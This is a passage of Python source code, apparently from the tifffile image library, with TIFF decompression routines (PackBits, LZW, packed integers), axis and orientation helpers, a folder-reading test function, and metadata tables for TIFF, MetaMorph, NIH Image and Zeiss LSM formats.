header = struct.unpack(byteorder+'4sI'*ntypes, data[4:4+ntypes*8])
pos = 4 + ntypes * 8
counter = 0
result = {}
for mtype, count in zip(header[::2], header[1::2]):
values = []
name, func = metadata_types.get(mtype, (_str(mtype), read_bytes))
for _ in range(count):
counter += 1
pos1 = pos + bytecounts[counter]
values.append(func(data[pos:pos1], byteorder))
pos = pos1
result[name.strip()] = values[0] if count == 1 else values
return result
def imagej_description(description):
"""Return dict from ImageJ image_description tag."""
def _bool(val):
return {b'true': True, b'false': False}[val.lower()]
_str = str if sys.version_info[0] < 3 else lambda x: str(x, 'cp1252')
result = {}
for line in description.splitlines():
try:
key, val = line.split(b'=')
except Exception:
continue
key = key.strip()
val = val.strip()
for dtype in (int, float, _bool, _str):
try:
val = dtype(val)
break
except Exception:
pass
result[_str(key)] = val
return result
def _replace_by(module_function, package=None, warn=False):
"""Try replace decorated function by module.function.
This is used to replace local functions with functions from another
(usually compiled) module, if available.
Parameters
----------
module_function : str
Module and function path string (e.g. numpy.ones)
package : str, optional
The parent package of the module
warn : bool, optional
Whether to warn when wrapping fails
Returns
-------
func : function
Wrapped function, hopefully calling a function in another module.
Example
-------
>>> @_replace_by('_tifffile.decodepackbits')
... def decodepackbits(encoded):
... raise NotImplementedError
"""
def decorate(func, module_function=module_function, warn=warn):
try:
modname, function = module_function.split('.')
if package is None:
full_name = modname
else:
full_name = package + '.' + modname
module = __import__(full_name, romlist=[modname])
func, oldfunc = getattr(module, function), func
globals()['__old_' + func.__name__] = oldfunc
except Exception:
if warn:
warnings.warn("failed to import %s" % module_function)
return func
return decorate
def decodejpg(encoded, tables=b'', photometric=None,
ycbcr_subsampling=None, ycbcr_positioning=None):
"""Decode JPEG encoded byte string (using _czifile extension module)."""
import _czifile
image = _czifile.decodejpg(encoded, tables)
if photometric == 'rgb' and ycbcr_subsampling and ycbcr_positioning:
# TODO: convert YCbCr to RGB
pass
return image.tostring()
@_replace_by('_tifffile.decodepackbits')
def decodepackbits(encoded):
"""Decompress PackBits encoded byte string.
PackBits is a simple byte-oriented run-length compression scheme.
"""
func = ord if sys.version[0] == '2' else lambda x: x
result = []
result_extend = result.extend
i = 0
try:
while True:
n = func(encoded[i]) + 1
i += 1
if n < 129:
result_extend(encoded[i:i+n])
i += n
elif n > 129:
result_extend(encoded[i:i+1] * (258-n))
i += 1
except IndexError:
pass
return b''.join(result) if sys.version[0] == '2' else bytes(result)
@_replace_by('_tifffile.decodelzw')
def decodelzw(encoded):
"""Decompress LZW (Lempel-Ziv-Welch) encoded TIFF strip (byte string).
The strip must begin with a CLEAR code and end with an EOI code.
This is an implementation of the LZW decoding algorithm described in (1).
It is not compatible with old style LZW compressed files like quad-lzw.tif.
"""
len_encoded = len(encoded)
bitcount_max = len_encoded * 8
unpack = struct.unpack
if sys.version[0] == '2':
newtable = [chr(i) for i in range(256)]
else:
newtable = [bytes([i]) for i in range(256)]
newtable.extend((0, 0))
def next_code():
"""Return integer of `bitw` bits at `bitcount` position in encoded."""
start = bitcount // 8
s = encoded[start:start+4]
try:
code = unpack('>I', s)[0]
except Exception:
code = unpack('>I', s + b'\x00'*(4-len(s)))[0]
code <<= bitcount % 8
code &= mask
return code >> shr
switchbitch = { # code: bit-width, shr-bits, bit-mask
255: (9, 23, int(9*'1'+'0'*23, 2)),
511: (10, 22, int(10*'1'+'0'*22, 2)),
1023: (11, 21, int(11*'1'+'0'*21, 2)),
2047: (12, 20, int(12*'1'+'0'*20, 2)), }
bitw, shr, mask = switchbitch[255]
bitcount = 0
if len_encoded < 4:
raise ValueError("strip must be at least 4 characters long")
if next_code() != 256:
raise ValueError("strip must begin with CLEAR code")
code = 0
oldcode = 0
result = []
result_append = result.append
while True:
code = next_code() # ~5% faster when inlining this function
bitcount += bitw
if code == 257 or bitcount >= bitcount_max: # EOI
break
if code == 256: # CLEAR
table = newtable[:]
table_append = table.append
lentable = 258
bitw, shr, mask = switchbitch[255]
code = next_code()
bitcount += bitw
if code == 257: # EOI
break
result_append(table[code])
else:
if code < lentable:
decoded = table[code]
newcode = table[oldcode] + decoded[:1]
else:
newcode = table[oldcode]
newcode += newcode[:1]
decoded = newcode
result_append(decoded)
table_append(newcode)
lentable += 1
oldcode = code
if lentable in switchbitch:
bitw, shr, mask = switchbitch[lentable]
if code != 257:
warnings.warn("unexpected end of lzw stream (code %i)" % code)
return b''.join(result)
@_replace_by('_tifffile.unpackints')
def unpackints(data, dtype, itemsize, runlen=0):
"""Decompress byte string to array of integers of any bit size <= 32.
Parameters
----------
data : byte str
Data to decompress.
dtype : numpy.dtype or str
A numpy boolean or integer type.
itemsize : int
Number of bits per integer.
runlen : int
Number of consecutive integers, after which to start at next byte.
"""
if itemsize == 1: # bitarray
data = numpy.fromstring(data, '|B')
data = numpy.unpackbits(data)
if runlen % 8:
data = data.reshape(-1, runlen + (8 - runlen % 8))
data = data[:, :runlen].reshape(-1)
return data.astype(dtype)
dtype = numpy.dtype(dtype)
if itemsize in (8, 16, 32, 64):
return numpy.fromstring(data, dtype)
if itemsize < 1 or itemsize > 32:
raise ValueError("itemsize out of range: %i" % itemsize)
if dtype.kind not in "biu":
raise ValueError("invalid dtype")
itembytes = next(i for i in (1, 2, 4, 8) if 8 * i >= itemsize)
if itembytes != dtype.itemsize:
raise ValueError("dtype.itemsize too small")
if runlen == 0:
runlen = len(data) // itembytes
skipbits = runlen*itemsize % 8
if skipbits:
skipbits = 8 - skipbits
shrbits = itembytes*8 - itemsize
bitmask = int(itemsize*'1'+'0'*shrbits, 2)
dtypestr = '>' + dtype.char # dtype always big endian?
unpack = struct.unpack
l = runlen * (len(data)*8 // (runlen*itemsize + skipbits))
result = numpy.empty((l, ), dtype)
bitcount = 0
for i in range(len(result)):
start = bitcount // 8
s = data[start:start+itembytes]
try:
code = unpack(dtypestr, s)[0]
except Exception:
code = unpack(dtypestr, s + b'\x00'*(itembytes-len(s)))[0]
code <<= bitcount % 8
code &= bitmask
result[i] = code >> shrbits
bitcount += itemsize
if (i+1) % runlen == 0:
bitcount += skipbits
return result
def unpackrgb(data, dtype='<B', bitspersample=(5, 6, 5), rescale=True):
"""Return array from byte string containing packed samples.
Use to unpack RGB565 or RGB555 to RGB888 format.
Parameters
----------
data : byte str
The data to be decoded. Samples in each pixel are stored consecutively.
Pixels are aligned to 8, 16, or 32 bit boundaries.
dtype : numpy.dtype
The sample data type. The byteorder applies also to the data stream.
bitspersample : tuple
Number of bits for each sample in a pixel.
rescale : bool
Upscale samples to the number of bits in dtype.
Returns
-------
result : ndarray
Flattened array of unpacked samples of native dtype.
Examples
--------
>>> data = struct.pack('BBBB', 0x21, 0x08, 0xff, 0xff)
>>> print(unpackrgb(data, '<B', (5, 6, 5), False))
[ 1 1 1 31 63 31]
>>> print(unpackrgb(data, '<B', (5, 6, 5)))
[ 8 4 8 255 255 255]
>>> print(unpackrgb(data, '<B', (5, 5, 5)))
[ 16 8 8 255 255 255]
"""
dtype = numpy.dtype(dtype)
bits = int(numpy.sum(bitspersample))
if not (bits <= 32 and all(i <= dtype.itemsize*8 for i in bitspersample)):
raise ValueError("sample size not supported %s" % str(bitspersample))
dt = next(i for i in 'BHI' if numpy.dtype(i).itemsize*8 >= bits)
data = numpy.fromstring(data, dtype.byteorder+dt)
result = numpy.empty((data.size, len(bitspersample)), dtype.char)
for i, bps in enumerate(bitspersample):
t = data >> int(numpy.sum(bitspersample[i+1:]))
t &= int('0b'+'1'*bps, 2)
if rescale:
o = ((dtype.itemsize * 8) // bps + 1) * bps
if o > data.dtype.itemsize * 8:
t = t.astype('I')
t *= (2**o - 1) // (2**bps - 1)
t //= 2**(o - (dtype.itemsize * 8))
result[:, i] = t
return result.reshape(-1)
def reorient(image, orientation):
"""Return reoriented view of image array.
Parameters
----------
image : numpy array
Non-squeezed output of asarray() functions.
Axes -3 and -2 must be image length and width respectively.
orientation : int or str
One of TIFF_ORIENTATIONS keys or values.
"""
o = TIFF_ORIENTATIONS.get(orientation, orientation)
if o == 'top_left':
return image
elif o == 'top_right':
return image[..., ::-1, :]
elif o == 'bottom_left':
return image[..., ::-1, :, :]
elif o == 'bottom_right':
return image[..., ::-1, ::-1, :]
elif o == 'left_top':
return numpy.swapaxes(image, -3, -2)
elif o == 'right_top':
return numpy.swapaxes(image, -3, -2)[..., ::-1, :]
elif o == 'left_bottom':
return numpy.swapaxes(image, -3, -2)[..., ::-1, :, :]
elif o == 'right_bottom':
return numpy.swapaxes(image, -3, -2)[..., ::-1, ::-1, :]
def squeeze_axes(shape, axes, skip='XY'):
"""Return shape and axes with single-dimensional entries removed.
Remove unused dimensions unless their axes are listed in 'skip'.
>>> squeeze_axes((5, 1, 2, 1, 1), 'TZYXC')
((5, 2, 1), 'TYX')
"""
if len(shape) != len(axes):
raise ValueError("dimensions of axes and shape don't match")
shape, axes = zip(*(i for i in zip(shape, axes)
if i[0] > 1 or i[1] in skip))
return shape, ''.join(axes)
def transpose_axes(data, axes, asaxes='CTZYX'):
"""Return data with its axes permuted to match specified axes.
A view is returned if possible.
>>> transpose_axes(numpy.zeros((2, 3, 4, 5)), 'TYXC', asaxes='CTZYX').shape
(5, 2, 1, 3, 4)
"""
for ax in axes:
if ax not in asaxes:
raise ValueError("unknown axis %s" % ax)
# add missing axes to data
shape = data.shape
for ax in reversed(asaxes):
if ax not in axes:
axes = ax + axes
shape = (1,) + shape
data = data.reshape(shape)
# transpose axes
data = data.transpose([axes.index(ax) for ax in asaxes])
return data
def stack_pages(pages, memmap=False, *args, **kwargs):
"""Read data from sequence of TiffPage and stack them vertically.
If memmap is True, return an array stored in a binary file on disk.
Additional parameters are passsed to the page asarray function.
"""
if len(pages) == 0:
raise ValueError("no pages")
if len(pages) == 1:
return pages[0].asarray(memmap=memmap, *args, **kwargs)
result = pages[0].asarray(*args, **kwargs)
shape = (len(pages),) + result.shape
if memmap:
with tempfile.NamedTemporaryFile() as fh:
result = numpy.memmap(fh, dtype=result.dtype, shape=shape)
else:
result = numpy.empty(shape, dtype=result.dtype)
for i, page in enumerate(pages):
result[i] = page.asarray(*args, **kwargs)
return result
def stripnull(string):
"""Return string truncated at first null character.
Clean NULL terminated C strings.
>>> stripnull(b'string\\x00') # doctest: +SKIP
b'string'
"""
i = string.find(b'\x00')
return string if (i < 0) else string[:i]
def stripascii(string):
"""Return string truncated at last byte that is 7bit ASCII.
Clean NULL separated and terminated TIFF strings.
>>> stripascii(b'string\\x00string\\n\\x01\\x00') # doctest: +SKIP
b'string\\x00string\\n'
>>> stripascii(b'\\x00') # doctest: +SKIP
b''
"""
# TODO: pythonize this
ord_ = ord if sys.version_info[0] < 3 else lambda x: x
i = len(string)
while i:
i -= 1
if 8 < ord_(string[i]) < 127:
break
else:
i = -1
return string[:i+1]
def format_size(size):
"""Return file size as string from byte size."""
for unit in ('B', 'KB', 'MB', 'GB', 'TB'):
if size < 2048:
return "%.f %s" % (size, unit)
size /= 1024.0
def sequence(value):
"""Return tuple containing value if value is not a sequence.
>>> sequence(1)
(1,)
>>> sequence([1])
[1]
"""
try:
len(value)
return value
except TypeError:
return (value, )
def product(iterable):
"""Return product of sequence of numbers.
Equivalent of functools.reduce(operator.mul, iterable, 1).
>>> product([2**8, 2**30])
274877906944
>>> product([])
1
"""
prod = 1
for i in iterable:
prod *= i
return prod
def natural_sorted(iterable):
"""Return human sorted list of strings.
E.g. for sorting file names.
>>> natural_sorted(['f1', 'f2', 'f10'])
['f1', 'f2', 'f10']
"""
def sortkey(x):
return [(int(c) if c.isdigit() else c) for c in re.split(numbers, x)]
numbers = re.compile(r'(\d+)')
return sorted(iterable, key=sortkey)
def excel_datetime(timestamp, epoch=datetime.datetime.fromordinal(693594)):
"""Return datetime object from timestamp in Excel serial format.
Convert LSM time stamps.
>>> excel_datetime(40237.029999999795)
datetime.datetime(2010, 2, 28, 0, 43, 11, 999982)
"""
return epoch + datetime.timedelta(timestamp)
def julian_datetime(julianday, milisecond=0):
"""Return datetime from days since 1/1/4713 BC and ms since midnight.
Convert Julian dates according to MetaMorph.
>>> julian_datetime(2451576, 54362783)
datetime.datetime(2000, 2, 2, 15, 6, 2, 783)
"""
if julianday <= 1721423:
# no datetime before year 1
return None
a = julianday + 1
if a > 2299160:
alpha = math.trunc((a - 1867216.25) / 36524.25)
a += 1 + alpha - alpha // 4
b = a + (1524 if a > 1721423 else 1158)
c = math.trunc((b - 122.1) / 365.25)
d = math.trunc(365.25 * c)
e = math.trunc((b - d) / 30.6001)
day = b - d - math.trunc(30.6001 * e)
month = e - (1 if e < 13.5 else 13)
year = c - (4716 if month > 2.5 else 4715)
hour, milisecond = divmod(milisecond, 1000 * 60 * 60)
minute, milisecond = divmod(milisecond, 1000 * 60)
second, milisecond = divmod(milisecond, 1000)
return datetime.datetime(year, month, day,
hour, minute, second, milisecond)
def test_tifffile(directory='testimages', verbose=True):
"""Read all images in directory.
Print error message on failure.
>>> test_tifffile(verbose=False)
"""
successful = 0
failed = 0
start = time.time()
for f in glob.glob(os.path.join(directory, '*.*')):
if verbose:
print("\n%s>\n" % f.lower(), end='')
t0 = time.time()
try:
tif = TiffFile(f, multifile=True)
except Exception as e:
if not verbose:
print(f, end=' ')
print("ERROR:", e)
failed += 1
continue
try:
img = tif.asarray()
except ValueError:
try:
img = tif[0].asarray()
except Exception as e:
if not verbose:
print(f, end=' ')
print("ERROR:", e)
failed += 1
continue
finally:
tif.close()
successful += 1
if verbose:
print("%s, %s %s, %s, %.0f ms" % (
str(tif), str(img.shape), img.dtype, tif[0].compression,
(time.time()-t0) * 1e3))
if verbose:
print("\nSuccessfully read %i of %i files in %.3f s\n" % (
successful, successful+failed, time.time()-start))
class TIFF_SUBFILE_TYPES(object):
def __getitem__(self, key):
result = []
if key & 1:
result.append('reduced_image')
if key & 2:
result.append('page')
if key & 4:
result.append('mask')
return tuple(result)
TIFF_PHOTOMETRICS = {
0: 'miniswhite',
1: 'minisblack',
2: 'rgb',
3: 'palette',
4: 'mask',
5: 'separated', # CMYK
6: 'ycbcr',
8: 'cielab',
9: 'icclab',
10: 'itulab',
32803: 'cfa', # Color Filter Array
32844: 'logl',
32845: 'logluv',
34892: 'linear_raw'
}
TIFF_COMPESSIONS = {
1: None,
2: 'ccittrle',
3: 'ccittfax3',
4: 'ccittfax4',
5: 'lzw',
6: 'ojpeg',
7: 'jpeg',
8: 'adobe_deflate',
9: 't85',
10: 't43',
32766: 'next',
32771: 'ccittrlew',
32773: 'packbits',
32809: 'thunderscan',
32895: 'it8ctpad',
32896: 'it8lw',
32897: 'it8mp',
32898: 'it8bl',
32908: 'pixarfilm',
32909: 'pixarlog',
32946: 'deflate',
32947: 'dcs',
34661: 'jbig',
34676: 'sgilog',
34677: 'sgilog24',
34712: 'jp2000',
34713: 'nef',
}
TIFF_DECOMPESSORS = {
None: lambda x: x,
'adobe_deflate': zlib.decompress,
'deflate': zlib.decompress,
'packbits': decodepackbits,
'lzw': decodelzw,
# 'jpeg': decodejpg
}
TIFF_DATA_TYPES = {
1: '1B', # BYTE 8-bit unsigned integer.
2: '1s', # ASCII 8-bit byte that contains a 7-bit ASCII code;
# the last byte must be NULL (binary zero).
3: '1H', # SHORT 16-bit (2-byte) unsigned integer
4: '1I', # LONG 32-bit (4-byte) unsigned integer.
5: '2I', # RATIONAL Two LONGs: the first represents the numerator of
# a fraction; the second, the denominator.
6: '1b', # SBYTE An 8-bit signed (twos-complement) integer.
7: '1s', # UNDEFINED An 8-bit byte that may contain anything,
# depending on the definition of the field.
8: '1h', # SSHORT A 16-bit (2-byte) signed (twos-complement) integer.
9: '1i', # SLONG A 32-bit (4-byte) signed (twos-complement) integer.
10: '2i', # SRATIONAL Two SLONGs: the first represents the numerator
# of a fraction, the second the denominator.
11: '1f', # FLOAT Single precision (4-byte) IEEE format.
12: '1d', # DOUBLE Double precision (8-byte) IEEE format.
13: '1I', # IFD unsigned 4 byte IFD offset.
#14: '', # UNICODE
#15: '', # COMPLEX
16: '1Q', # LONG8 unsigned 8 byte integer (BigTiff)
17: '1q', # SLONG8 signed 8 byte integer (BigTiff)
18: '1Q', # IFD8 unsigned 8 byte IFD offset (BigTiff)
}
TIFF_SAMPLE_FORMATS = {
1: 'uint',
2: 'int',
3: 'float',
#4: 'void',
#5: 'complex_int',
6: 'complex',
}
TIFF_SAMPLE_DTYPES = {
('uint', 1): '?', # bitmap
('uint', 2): 'B',
('uint', 3): 'B',
('uint', 4): 'B',
('uint', 5): 'B',
('uint', 6): 'B',
('uint', 7): 'B',
('uint', 8): 'B',
('uint', 9): 'H',
('uint', 10): 'H',
('uint', 11): 'H',
('uint', 12): 'H',
('uint', 13): 'H',
('uint', 14): 'H',
('uint', 15): 'H',
('uint', 16): 'H',
('uint', 17): 'I',
('uint', 18): 'I',
('uint', 19): 'I',
('uint', 20): 'I',
('uint', 21): 'I',
('uint', 22): 'I',
('uint', 23): 'I',
('uint', 24): 'I',
('uint', 25): 'I',
('uint', 26): 'I',
('uint', 27): 'I',
('uint', 28): 'I',
('uint', 29): 'I',
('uint', 30): 'I',
('uint', 31): 'I',
('uint', 32): 'I',
('uint', 64): 'Q',
('int', 8): 'b',
('int', 16): 'h',
('int', 32): 'i',
('int', 64): 'q',
('float', 16): 'e',
('float', 32): 'f',
('float', 64): 'd',
('complex', 64): 'F',
('complex', 128): 'D',
('uint', (5, 6, 5)): 'B',
}
TIFF_ORIENTATIONS = {
1: 'top_left',
2: 'top_right',
3: 'bottom_right',
4: 'bottom_left',
5: 'left_top',
6: 'right_top',
7: 'right_bottom',
8: 'left_bottom',
}
# TODO: is there a standard for character axes labels?
AXES_LABELS = {
'X': 'width',
'Y': 'height',
'Z': 'depth',
'S': 'sample', # rgb(a)
'I': 'series', # general sequence, plane, page, IFD
'T': 'time',
'C': 'channel', # color, emission wavelength
'A': 'angle',
'P': 'phase', # formerly F # P is Position in LSM!
'R': 'tile', # region, point, mosaic
'H': 'lifetime', # histogram
'E': 'lambda', # excitation wavelength
'L': 'exposure', # lux
'V': 'event',
'Q': 'other',
#'M': 'mosaic', # LSM 6
}
AXES_LABELS.update(dict((v, k) for k, v in AXES_LABELS.items()))
# Map OME pixel types to numpy dtype
OME_PIXEL_TYPES = {
'int8': 'i1',
'int16': 'i2',
'int32': 'i4',
'uint8': 'u1',
'uint16': 'u2',
'uint32': 'u4',
'float': 'f4',
# 'bit': 'bit',
'double': 'f8',
'complex': 'c8',
'double-complex': 'c16',
}
# NIH Image PicHeader v1.63
NIH_IMAGE_HEADER = [
('fileid', 'a8'),
('nlines', 'i2'),
('pixelsperline', 'i2'),
('version', 'i2'),
('oldlutmode', 'i2'),
('oldncolors', 'i2'),
('colors', 'u1', (3, 32)),
('oldcolorstart', 'i2'),
('colorwidth', 'i2'),
('extracolors', 'u2', (6, 3)),
('nextracolors', 'i2'),
('foregroundindex', 'i2'),
('backgroundindex', 'i2'),
('xscale', 'f8'),
('_x0', 'i2'),
('_x1', 'i2'),
('units_t', 'i2'), # NIH_UNITS_TYPE
('p1', [('x', 'i2'), ('y', 'i2')]),
('p2', [('x', 'i2'), ('y', 'i2')]),
('curvefit_t', 'i2'), # NIH_CURVEFIT_TYPE
('ncoefficients', 'i2'),
('coeff', 'f8', 6),
('_um_len', 'u1'),
('um', 'a15'),
('_x2', 'u1'),
('binarypic', 'b1'),
('slicestart', 'i2'),
('sliceend', 'i2'),
('scalemagnification', 'f4'),
('nslices', 'i2'),
('slicespacing', 'f4'),
('currentslice', 'i2'),
('frameinterval', 'f4'),
('pixelaspectratio', 'f4'),
('colorstart', 'i2'),
('colorend', 'i2'),
('ncolors', 'i2'),
('fill1', '3u2'),
('fill2', '3u2'),
('colortable_t', 'u1'), # NIH_COLORTABLE_TYPE
('lutmode_t', 'u1'), # NIH_LUTMODE_TYPE
('invertedtable', 'b1'),
('zeroclip', 'b1'),
('_xunit_len', 'u1'),
('xunit', 'a11'),
('stacktype_t', 'i2'), # NIH_STACKTYPE_TYPE
]
NIH_COLORTABLE_TYPE = (
'CustomTable', 'AppleDefault', 'Pseudo20', 'Pseudo32', 'Rainbow',
'Fire1', 'Fire2', 'Ice', 'Grays', 'Spectrum')
NIH_LUTMODE_TYPE = (
'PseudoColor', 'OldAppleDefault', 'OldSpectrum', 'GrayScale',
'ColorLut', 'CustomGrayscale')
NIH_CURVEFIT_TYPE = (
'StraightLine', 'Poly2', 'Poly3', 'Poly4', 'Poly5', 'ExpoFit',
'PowerFit', 'LogFit', 'RodbardFit', 'SpareFit1', 'Uncalibrated',
'UncalibratedOD')
NIH_UNITS_TYPE = (
'Nanometers', 'Micrometers', 'Millimeters', 'Centimeters', 'Meters',
'Kilometers', 'Inches', 'Feet', 'Miles', 'Pixels', 'OtherUnits')
NIH_STACKTYPE_TYPE = (
'VolumeStack', 'RGBStack', 'MovieStack', 'HSVStack')
# Map Universal Imaging Corporation MetaMorph internal tag ids to name and type
UIC_TAGS = {
0: ('auto_scale', int),
1: ('min_scale', int),
2: ('max_scale', int),
3: ('spatial_calibration', int),
4: ('x_calibration', Fraction),
5: ('y_calibration', Fraction),
6: ('calibration_units', str),
7: ('name', str),
8: ('thresh_state', int),
9: ('thresh_state_red', int),
10: ('tagid_10', None), # undefined
11: ('thresh_state_green', int),
12: ('thresh_state_blue', int),
13: ('thresh_state_lo', int),
14: ('thresh_state_hi', int),
15: ('zoom', int),
16: ('create_time', julian_datetime),
17: ('last_saved_time', julian_datetime),
18: ('current_buffer', int),
19: ('gray_fit', None),
20: ('gray_point_count', None),
21: ('gray_x', Fraction),
22: ('gray_y', Fraction),
23: ('gray_min', Fraction),
24: ('gray_max', Fraction),
25: ('gray_unit_name', str),
26: ('standard_lut', int),
27: ('wavelength', int),
28: ('stage_position', '(%i,2,2)u4'), # N xy positions as fractions
29: ('camera_chip_offset', '(%i,2,2)u4'), # N xy offsets as fractions
30: ('overlay_mask', None),
31: ('overlay_compress', None),
32: ('overlay', None),
33: ('special_overlay_mask', None),
34: ('special_overlay_compress', None),
35: ('special_overlay', None),
36: ('image_property', read_uic_image_property),
37: ('stage_label', '%ip'), # N str
38: ('autoscale_lo_info', Fraction),
39: ('autoscale_hi_info', Fraction),
40: ('absolute_z', '(%i,2)u4'), # N fractions
41: ('absolute_z_valid', '(%i,)u4'), # N long
42: ('gamma', int),
43: ('gamma_red', int),
44: ('gamma_green', int),
45: ('gamma_blue', int),
46: ('camera_bin', int),
47: ('new_lut', int),
48: ('image_property_ex', None),
49: ('plane_property', int),
50: ('user_lut_table', '(256,3)u1'),
51: ('red_autoscale_info', int),
52: ('red_autoscale_lo_info', Fraction),
53: ('red_autoscale_hi_info', Fraction),
54: ('red_minscale_info', int),
55: ('red_maxscale_info', int),
56: ('green_autoscale_info', int),
57: ('green_autoscale_lo_info', Fraction),
58: ('green_autoscale_hi_info', Fraction),
59: ('green_minscale_info', int),
60: ('green_maxscale_info', int),
61: ('blue_autoscale_info', int),
62: ('blue_autoscale_lo_info', Fraction),
63: ('blue_autoscale_hi_info', Fraction),
64: ('blue_min_scale_info', int),
65: ('blue_max_scale_info', int),
#66: ('overlay_plane_color', read_uic_overlay_plane_color),
}
# Olympus FluoView
MM_DIMENSION = [
('name', 'a16'),
('size', 'i4'),
('origin', 'f8'),
('resolution', 'f8'),
('unit', 'a64'),
]
MM_HEADER = [
('header_flag', 'i2'),
('image_type', 'u1'),
('image_name', 'a257'),
('offset_data', 'u4'),
('palette_size', 'i4'),
('offset_palette0', 'u4'),
('offset_palette1', 'u4'),
('comment_size', 'i4'),
('offset_comment', 'u4'),
('dimensions', MM_DIMENSION, 10),
('offset_position', 'u4'),
('map_type', 'i2'),
('map_min', 'f8'),
('map_max', 'f8'),
('min_value', 'f8'),
('max_value', 'f8'),
('offset_map', 'u4'),
('gamma', 'f8'),
('offset', 'f8'),
('gray_channel', MM_DIMENSION),
('offset_thumbnail', 'u4'),
('voice_field', 'i4'),
('offset_voice_field', 'u4'),
]
# Carl Zeiss LSM
CZ_LSM_INFO = [
('magic_number', 'u4'),
('structure_size', 'i4'),
('dimension_x', 'i4'),
('dimension_y', 'i4'),
('dimension_z', 'i4'),
('dimension_channels', 'i4'),
('dimension_time', 'i4'),
('data_type', 'i4'), # CZ_DATA_TYPES
('thumbnail_x', 'i4'),
('thumbnail_y', 'i4'),
('voxel_size_x', 'f8'),
('voxel_size_y', 'f8'),
('voxel_size_z', 'f8'),
('origin_x', 'f8'),
('origin_y', 'f8'),
('origin_z', 'f8'),
('scan_type', 'u2'),
('spectral_scan', 'u2'),
('type_of_data', 'u4'), # CZ_TYPE_OF_DATA
('offset_vector_overlay', 'u4'),
('offset_input_lut', 'u4'),
('offset_output_lut', 'u4'),
('offset_channel_colors', 'u4'),
('time_interval', 'f8'),
('offset_channel_data_types', 'u4'),
('offset_scan_info', 'u4'), # CZ_LSM_SCAN_INFO
('offset_ks_data', 'u4'),
('offset_time_stamps', 'u4'),
('offset_event_list', 'u4'),
('offset_roi', 'u4'),
('offset_bleach_roi', 'u4'),
('offset_next_recording', 'u4'),
# LSM 2.0 ends here
('display_aspect_x', 'f8'),
('display_aspect_y', 'f8'),
('display_aspect_z', 'f8'),
('display_aspect_time', 'f8'),
('offset_mean_of_roi_overlay', 'u4'),
('offset_topo_isoline_overlay', 'u4'),
('offset_topo_profile_overlay', 'u4'),
('offset_linescan_overlay', 'u4'),
('offset_toolbar_flags', 'u4'),
('offset_channel_wavelength', 'u4'),
('offset_channel_factors', 'u4'),
('objective_sphere_correction', 'f8'),
('offset_unmix_parameters', 'u4'),
# LSM 3.2, 4.0 end here
('offset_acquisition_parameters', 'u4'),
('offset_characteristics', 'u4'),
('offset_palette', 'u4'),
('time_difference_x', 'f8'),
('time_difference_y', 'f8'),
('time_difference_z', 'f8'),
('internal_use_1', 'u4'),
('dimension_p', 'i4'),
('dimension_m', 'i4'),
('dimensions_reserved', '16i4'),
('offset_tile_positions', 'u4'),
('reserved_1', '9u4'),
('offset_positions', 'u4'),
('reserved_2', '21u4'), # must be 0
]
# Import functions for LSM_INFO sub-records
CZ_LSM_INFO_READERS = {
'scan_info': read_cz_lsm_scan_info,
'time_stamps': read_cz_lsm_time_stamps,
'event_list': read_cz_lsm_event_list,
'channel_colors': read_cz_lsm_floatpairs,
'positions': read_cz_lsm_floatpairs,
'tile_positions': read_cz_lsm_floatpairs,
}
# Map cz_lsm_info.scan_type to dimension order
CZ_SCAN_TYPES = {
0: 'XYZCT', # x-y-z scan
1: 'XYZCT', # z scan (x-z plane)
2: 'XYZCT', # line scan
3: 'XYTCZ', # time series x-y
4: 'XYZTC', # time series x-z
5: 'XYTCZ', # time series 'Mean of ROIs'
6: 'XYZTC', # time series x-y-z
7: 'XYCTZ', # spline scan
8: 'XYCZT', # spline scan x-z
9: 'XYTCZ', # time series spline plane x-z
10: 'XYZCT', # point mode
}
# Map dimension codes to cz_lsm_info attribute
CZ_DIMENSIONS = {
'X': 'dimension_x',
'Y': 'dimension_y',
'Z': 'dimension_z',
'C': 'dimension_channels',
'T': 'dimension_time',
}
# Description of cz_lsm_info.data_type
CZ_DATA_TYPES = {
0: 'varying data types',
1: '8 bit unsigned integer',
2: '12 bit unsigned integer',
5: '32 bit float',
}
# Description of cz_lsm_info.type_of_data
CZ_TYPE_OF_DATA = {
0: 'Original scan data',
1: 'Calculated data',
2: '3D reconstruction',
3: 'Topography height map',
}
CZ_LSM_SCAN_INFO_ARRAYS = {
0x20000000: "tracks",
0x30000000: "lasers",
0x60000000: "detection_channels",
0x80000000: "illumination_channels",
0xa0000000: "beam_splitters",
0xc0000000: "data_channels",
0x11000000: "timers",
0x13000000: "markers",
}
CZ_LSM_SCAN_INFO_STRUCTS = {
# 0x10000000: "recording",
0x40000000: "track",
0x50000000: "laser",
0x70000000: "detection_channel",
0x90000000: "illumination_channel",
0xb0000000: "beam_splitter",
0xd0000000: "data_channel",
0x12000000: "timer",
0x14000000: "marker",
}
CZ_LSM_SCAN_INFO_ATTRIBUTES = {
# recording
0x10000001: "name",
0x10000002: "description",
0x10000003: "notes",
0x10000004: "objective",
0x10000005: "processing_summary",
0x10000006: "special_scan_mode",
0x10000007: "scan_type",
0x10000008: "scan_mode",
0x10000009: "number_of_stacks",
0x1000000a: "lines_per_plane",
0x1000000b: "samples_per_line",
0x1000000c: "planes_per_volume",
0x1000000d: "images_width",
0x1000000e: "images_height",
0x1000000f: "images_number_planes",
0x10000010: "images_number_stacks",
0x10000011: "images_number_channels",
0x10000012: "linscan_xy_size",
0x10000013: "scan_direction",
0x10000014: "time_series",
0x10000015: "original_scan_data",
0x10000016: "zoom_x",
0x10000017: "zoom_y",
0x10000018: "zoom_z",
0x10000019: "sample_0x",
0x1000001a: "sample_0y",
0x1000001b: "sample_0z",
0x1000001c: "sample_spacing",
0x1000001d: "line_spacing",
0x1000001e: "plane_spacing",
0x1000001f: "plane_width",
0x10000020: "plane_height",
0x10000021: "volume_depth",
0x10000023: "nutation",
0x10000034: "rotation",
0x10000035: "precession",
0x10000036: "sample_0time",
0x10000037: "start_scan_trigger_in",
0x10000038: "start_scan_trigger_out",
0x10000039: "start_scan_event",
0x10000040: "start_scan_time",
0x10000041: "stop_scan_trigger_in",
0x10000042: "stop_scan_trigger_out",
0x10000043: "stop_scan_event",
0x10000044: "stop_scan_time",
0x10000045: "use_rois",
0x10000046: "use_reduced_memory_rois",
0x10000047: "user",
0x10000048: "use_bc_correction",
0x10000049: "position_bc_correction1",
0x10000050: "position_bc_correction2",
0x10000051: "interpolation_y",
0x10000052: "camera_binning",
0x10000053: "camera_supersampling",
0x10000054: "camera_frame_width",
0x10000055: "camera_frame_height",
0x10000056: "camera_offset_x",
0x10000057: "camera_offset_y",
0x10000059: "rt_binning",
0x1000005a: "rt_frame_width",
